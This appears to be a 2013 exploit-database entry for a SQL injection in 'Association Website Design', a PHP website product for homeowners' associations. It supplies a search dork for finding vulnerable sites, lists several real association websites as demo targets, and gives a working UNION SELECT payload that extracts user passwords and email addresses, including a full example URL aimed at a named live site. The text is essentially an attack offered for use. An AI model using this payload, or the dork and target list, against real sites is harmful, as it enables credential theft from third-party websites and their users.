Association WebDesign SQL Injection Vulnerability

2013-11-30T00:00:00
ID 1337DAY-ID-21585
Type zdt
Reporter datahack
Modified 2013-11-30T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            _                 _                 _     
    | |      _        | |               | |    
  _ | | ____| |_  ____| | _   ____  ____| |  _ 
 / || |/ _  |  _)/ _  | || \ / _  |/ ___) | / )
( (_| ( ( | | |_( ( | | | | ( ( | ( (___| |< ( 
 \____|\_||_|\___)_||_|_| |_|\_||_|\____)_| \_)
                                               

#
# Exploit Title :Association Website Design SQL Injection
#
# Dork : intext:Association Website Design by HOA Online Resource inurl:id=
#
# Exploit Author : datahack team
#
# Date: 2013-11-29
#
# vonder url : www.hoaonlineresource.com
# 
# Home : www.datahack.ir
#
# Security Risk : High
#
# Version : ALL Version
#
#
# Tested on: Linux
#
##############
# Demos:
# 
# http://www.foxhollowhoa.org/news.php?id=6'
# http://www.irislanding.com/news.php?id=6'
# http://www.grovehoa.com/news.php?id=1'
# 
# Exploit:
# 
# http://site/news.php?id=-24[SQL]
#
# poc:  
#
# http://site/news.php?id=-24+UNION+SELECT 1,2,3,pw,emailaddr,6+from users--
#
# Example:
# 
# http://www.wakefieldhoa.com/news.php?id=-24+UNION+SELECT+1,2,3,pw,emailaddr,6+from+users--
#
################
# Greetz to: ALL IRANIAN HACKER
#
# ===IRANIAN HACKER===
#
# contact with me: 
#
# [email protected]
#
##############

#  0day.today [2018-03-02]  #